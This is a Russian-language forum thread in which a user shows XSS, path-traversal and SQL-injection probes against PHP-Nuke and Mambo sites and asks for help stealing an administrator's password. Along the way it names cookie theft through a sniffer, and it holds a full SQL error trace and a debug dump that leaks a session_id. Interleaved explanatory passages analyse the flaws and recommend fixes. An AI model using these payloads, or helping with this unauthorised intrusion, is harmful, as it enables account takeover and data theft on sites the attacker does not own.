В общем, посмотрел я видео по взлому Nuke 7.8 и попробовал кое-что из того, что там описано. Пассивные (отражённые) XSS: 1) (параметр username) http://ya.ru/nuke/modules.php?name=Your_Account&code=ggg&op=mailpasswd&username=<h1>[XSS] — ответ: «Регистрационный код для [XSS] отправлен». Значение параметра попало в текст ответа; сам тег <h1> в сообщении не виден — либо браузер его отрисовал (тогда это отражённая XSS), либо его вырезали, надо смотреть исходник страницы. 2) (дырявый поиск) search"style="background:url(javascript:alert()) — выдал ошибку в пустом окошке. 3) http://[target]/[nuke_dir]/modules.php?name=Search&file=../../../../../../../../../etc/passwd%00 — пишет «You are so cool...»; это ответ фильтра на попытку обхода каталогов, а не содержимое /etc/passwd. 4) http://[target]/[nuke_dir]/modules.php?name=Search&author=[author]&topic=0&min=999999999[XSS]&query=[our query] — ответ: «Результат поиска. Ничего не найдено по вашему запросу 999999999. Предыдущие» — сам [XSS] в ответ не попал (вероятно, min приводится к числу или теги вырезаны). 5) http://[target]/nuke75/index.php?inside_mod=1 — ответ: «The html tags you attempted to use are not allowed [ Go Back ]» — здесь тоже сработал фильтр. Вот вроде и всё. Подскажите, пожалуйста, как с помощью этого узнать пароль админа — логин я знаю. Если можно, опишите подробнее... P.S. Извините за корявое объяснение. Заранее благодарен за помощь.
Мда... Это и есть JavaScript! Короче, тут XSS-уязвимость... Тут стоит фильтрация... Тут тоже... Короче, читай инфу по XSS и поймёшь, как с помощью этого украсть куки админа... (Учти: через XSS получаешь не пароль, а сессионные куки, и только если админ сам перейдёт по твоей ссылке, а его сессионная кука доступна скрипту на странице.)
В общем, почитал я статейки по XSS — не всё, конечно, понял, но сниффер поставить смог. Единственная проблема — как теперь ссылку на него в сайт впихнуть. Да, кстати, тут ещё один вопрос по Мамбе назрел. Есть сайтик, стоит Mambo, я вписал: http://сайт.ru/index.php?option=com_content&task=vote&id=%d&Itemid=%d&cid=1&user_rating=1,rating_count=[sql]/* — в ответ: Notice: You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '[sql]/*, lastip = 'МОЙ АЙПИ' WHERE content_id = 1' at lin in /home/c/cайт.h16.ru/WWW/includes/database.php on line 184 UPDATE mos_content_rating SET rating_count = rating_count + 1, rating_sum = rating_sum + 1,rating_count=[sql]/*, lastip = МОЙ АЙПИ WHERE content_id = 1 /home/c/сайт.ru/WWW/components/com_content/content.php:1426 /home/c/сайт.h16.ru/WWW/components/com_content/content.php:96 /home/c/сайт.h16.ru/WWW/index.php:180 DB function failed with error number 1064 You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '[sql]/*, lastip = МОЙ АЙПИ WHERE content_id = 1' at lin SQL=UPDATE mos_content_rating SET rating_count = rating_count + 1, rating_sum = rating_sum + 1,rating_count=[sql]/*, lastip = МОЙ АЙПИ WHERE content_id = 1 _____ По-моему, это дырка? Судя по тексту ошибки — да: значение параметра user_rating (здесь `1,rating_count=[sql]/*`) подставлено в UPDATE как есть, без экранирования и без приведения к числу, и сервер вернул полный текст запроса. Ошибка 1064 возникла просто потому, что `[sql]` с квадратными скобками — не валидный SQL, а комментарий `/*` не закрыт. Заодно видно, что включён подробный вывод ошибок БД: наружу утекают абсолютные пути (/home/c/.../WWW/...), имена файлов с номерами строк и префикс таблиц mos_. С точки зрения защиты: параметр надо приводить к целому (или экранировать), а вывод ошибок БД на страницу — отключить.
Да кстати у них на главной странице вот такая фигня внизу вылезает: 37 queries executed 1 SELECT template FROM mos_templates_menu WHERE client_id='0' AND menuid='0'--------------------------------------------------------------------------------2 DELETE FROM mos_session WHERE (time < 1164353432)--------------------------------------------------------------------------------3 SELECT * FROM mos_session WHERE session_id='53399328d45328e8a9f739413b1596c2'--------------------------------------------------------------------------------4 UPDATE mos_session SET `time`='1164354332',`userid`='0',`usertype`='',`username`='',`gid`='0',`guest`='1' WHERE session_id='53399328d45328e8a9f739413b1596c2'--------------------------------------------------------------------------------5 SELECT folder, element, published, CONCAT_WS('/',folder,element) AS lookup FROM mos_mambots WHERE published >= 1 AND access <= 0 AND folder='editors' ORDER BY ordering--------------------------------------------------------------------------------6 SELECT folder, element, published, CONCAT_WS('/',folder,element) AS lookup FROM mos_mambots WHERE published >= 1 AND access <= 0 AND folder='editors-xtd' ORDER BY ordering--------------------------------------------------------------------------------7 SELECT access FROM mos_menu WHERE link like 'index.php?option=com_poll&task=results%'--------------------------------------------------------------------------------8 SELECT * FROM mos_polls WHERE id='14'--------------------------------------------------------------------------------9 SELECT MIN(date) AS mindate, MAX(date) AS maxdate FROM mos_poll_date WHERE poll_id='14'--------------------------------------------------------------------------------10 SELECT a.text, count( DISTINCT b.id ) AS hits, count( DISTINCT b.id )/COUNT( DISTINCT c.id )*100.0 AS percent FROM mos_poll_data AS a LEFT JOIN mos_poll_date AS b ON b.vote_id = a.id LEFT JOIN mos_poll_date AS c ON c.poll_id = a.pollid WHERE a.pollid='14' AND a.text 
<> '' GROUP BY a.id ORDER BY a.id--------------------------------------------------------------------------------11 SELECT id, title FROM mos_polls WHERE published=1 ORDER BY id--------------------------------------------------------------------------------12 SELECT * FROM mos_menu WHERE id='0'--------------------------------------------------------------------------------13 SELECT id, title, module, position, content, showtitle, params FROM mos_modules AS m, mos_modules_menu AS mm WHERE m.published='1' AND m.access <= '0' AND m.client_id='0' AND mm.moduleid=m.id AND (mm.menuid = '0' OR mm.menuid = '0') ORDER BY ordering--------------------------------------------------------------------------------14 SELECT id, link FROM mos_menu WHERE menutype='mainmenu' AND published='1' ORDER BY parent, ordering LIMIT 1--------------------------------------------------------------------------------15 SELECT id, name, link, parent, type FROM mos_menu WHERE published='1' ORDER BY parent, ordering--------------------------------------------------------------------------------16 SELECT m.* FROM mos_menu AS m WHERE menutype='topmenu' AND published='1' AND access <= '0' AND parent='0' ORDER BY ordering--------------------------------------------------------------------------------17 SELECT m.* FROM mos_menu AS m WHERE menutype='mainmenu' AND published='1' AND access <= '0' ORDER BY parent,ordering--------------------------------------------------------------------------------18 SELECT id FROM mos_menu WHERE type='content_typed' AND published='1' AND link='index.php?option=com_content&task=view&id=24'--------------------------------------------------------------------------------19 SELECT id FROM mos_menu WHERE type='content_item_link' AND published='1' AND link='index.php?option=com_content&task=view&id=24'--------------------------------------------------------------------------------20 SELECT id FROM mos_menu WHERE type='content_typed' AND published='1' AND 
link='index.php?option=com_content&task=view&id=21'--------------------------------------------------------------------------------21 SELECT id FROM mos_menu WHERE type='content_item_link' AND published='1' AND link='index.php?option=com_content&task=view&id=21'--------------------------------------------------------------------------------22 SELECT id FROM mos_menu WHERE type='content_typed' AND published='1' AND link='index.php?option=com_content&task=view&id=20'--------------------------------------------------------------------------------23 SELECT id FROM mos_menu WHERE type='content_item_link' AND published='1' AND link='index.php?option=com_content&task=view&id=20'--------------------------------------------------------------------------------24 SELECT id FROM mos_menu WHERE type='content_typed' AND published='1' AND link='index.php?option=com_content&task=view&id=23'--------------------------------------------------------------------------------25 SELECT id FROM mos_menu WHERE type='content_item_link' AND published='1' AND link='index.php?option=com_content&task=view&id=23'--------------------------------------------------------------------------------26 SELECT id FROM mos_menu WHERE type='content_typed' AND published='1' AND link='index.php?option=com_content&task=view&id=22'--------------------------------------------------------------------------------27 SELECT id FROM mos_menu WHERE type='content_item_link' AND published='1' AND link='index.php?option=com_content&task=view&id=22'--------------------------------------------------------------------------------28 SELECT id FROM mos_menu WHERE type='content_typed' AND published='1' AND link='index.php?option=com_content&task=view&id=25'--------------------------------------------------------------------------------29 SELECT id FROM mos_menu WHERE type='content_item_link' AND published='1' AND 
link='index.php?option=com_content&task=view&id=25'--------------------------------------------------------------------------------30 SELECT m.* FROM mos_menu AS m WHERE menutype='othermenu' AND published='1' AND access <= '0' ORDER BY parent,ordering--------------------------------------------------------------------------------31 SELECT count(*) AS numrows FROM mos_banner WHERE showBanner=1--------------------------------------------------------------------------------32 SELECT * FROM mos_banner WHERE showBanner=1 LIMIT 0,1--------------------------------------------------------------------------------33 SELECT p.id, p.title FROM mos_poll_menu AS pm, mos_polls AS p WHERE (pm.menuid='0' OR pm.menuid='0') AND p.id=pm.pollid AND p.published=1--------------------------------------------------------------------------------34 SELECT id, text FROM mos_poll_data WHERE pollid='14' AND text <> '' ORDER BY id--------------------------------------------------------------------------------35 SELECT count(session_id) as guest_online FROM mos_session WHERE guest=1 AND (usertype is NULL OR usertype='')--------------------------------------------------------------------------------36 SELECT DISTINCT count(username) as user_online FROM mos_session WHERE guest=0 AND usertype <> 'administrator' AND usertype <> 'superadministrator'--------------------------------------------------------------------------------37 SELECT DISTINCT a.username FROM mos_session AS a WHERE (a.guest=0) По-моему, это та же дырка, хотя могу и ошибаться. Уточнение: это не та же дырка, а отдельная проблема — на сайте включён отладочный вывод, который печатает внизу страницы все выполненные SQL-запросы (тот самый «37 queries executed»). Сам по себе он не позволяет выполнить свой SQL, но раскрывает префикс и имена таблиц (mos_session, mos_menu, mos_polls и т.д.), структуру запросов и даже session_id посетителя (запросы 3 и 4 в списке) — то есть это утечка информации, которая облегчает эксплуатацию инъекции из предыдущего сообщения. Администратору сайта нужно отключить отладку и вывод ошибок БД на страницу.